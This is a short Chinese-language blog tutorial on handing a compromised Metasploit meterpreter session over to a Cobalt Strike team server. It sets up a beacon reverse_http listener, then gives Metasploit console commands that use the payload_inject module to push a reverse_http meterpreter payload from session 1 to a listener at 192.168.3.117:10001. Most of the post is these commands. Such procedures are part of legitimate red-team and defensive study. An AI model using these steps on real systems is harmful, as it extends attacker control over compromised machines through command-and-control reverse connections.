msf+cobaltstrike联动(一):把msf的session发给cobaltstrike

发表于 | 更新于: | 分类于 | | 阅读次数:
字数统计: 151 | 阅读时长 ≈ 1

前提:MFS已经获取到session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。

cobaltstrike起一个beacon监听

如使用:windows/beacon_http/reverse_http

设置好host和port之后启动监听。

MSF中使用

use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set payload windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.3.117
msf exploit(payload_inject) > set LPORT 10001
msf exploit(payload_inject) > set SESSION 1

注:set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的

都设置好后

msf exploit(payload_inject) > run

去CS端查看结果

cs成功接收到msf中的session

-------------本文结束❤感谢阅读-------------

本文标题:msf+cobaltstrike联动(一):把msf的session发给cobaltstrike

文章作者:MaiKeFee

发布时间:2019年09月11日

最后更新:2019年09月11日

原始链接:http://MaiKeFee.com/archives/c2c552f3.html